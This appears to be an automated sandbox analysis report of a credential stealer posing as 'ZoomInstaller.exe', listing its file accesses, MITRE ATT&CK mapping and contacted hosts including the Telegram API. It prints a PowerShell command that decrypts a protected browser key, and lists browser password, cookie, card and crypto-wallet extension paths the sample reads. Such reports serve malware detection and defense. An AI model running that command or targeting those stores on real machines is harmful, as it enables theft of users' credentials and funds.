    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\Documents\GIGIYTFFYT VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\Documents\My Music VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\Documents\My Pictures VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\Documents\QCFWYSKMHA VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Autofills VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cards VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\History VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Passwords VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Wallets VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Autofills VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\History VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Passwords VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile\Wallets VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Queries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File created: C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txt
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File created: C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txt
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File created: C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txt
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Neon\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigli
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | Directory queried: C:\Users\user\Documents
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
    Source: Yara match | File source: Process Memory Space: ZoomInstaller.exe PID: 5368, type: MEMORYSTR
    MITRE ATT&CK matrix, listed by tactic (the number in parentheses is the count attached to that technique in the matrix):

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (12); At; Cron; Launchd; Scheduled Task; Systemd Timers
    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Defense Evasion: Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Obfuscated Files or Information (1); Install Root Certificate (1); DLL Side-Loading (1)
    Credential Access: OS Credential Dumping (1); Input Capture (11); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: Query Registry (1); Security Software Discovery (11); Process Discovery (2); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (13)
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: Input Capture (11); Archive Collected Data (1); Data from Local System (21); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Command and Control: Web Service (1); Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Multiband Communication; Commonly Used Port
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
    Behavior Graph (ID: 1544493; Sample: ZoomInstaller.exe; Start date: 29/10/2024; Architecture: WINDOWS; Score: 76)

    Start node:
    • DNS/IP: api.telegram.org, manestvli.shop, api.myip.com
    • Signatures: Suricata IDS alerts for network traffic; Machine Learning detection for sample; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); AI detected suspicious sample; Uses the Telegram API (likely for C&C communication) (attached to api.telegram.org)
    • Started process: ZoomInstaller.exe (25)

    ZoomInstaller.exe:
    • DNS/IP: api.telegram.org 149.154.167.220, 443, 49980, TELEGRAMRU, United Kingdom; manestvli.shop 188.114.97.3, 443, 49970, CLOUDFLARENETUS, European Union; api.myip.com 104.26.9.59, 443, 49709, CLOUDFLARENETUS, United States
    • Dropped files: C:\Users\user\AppData\Local\...\history.db (SQLite); C:\Users\user\AppData\Local\...\webdata.db (SQLite); C:\Users\user\AppData\Local\...\passwords.db (SQLite); 5 other malicious files
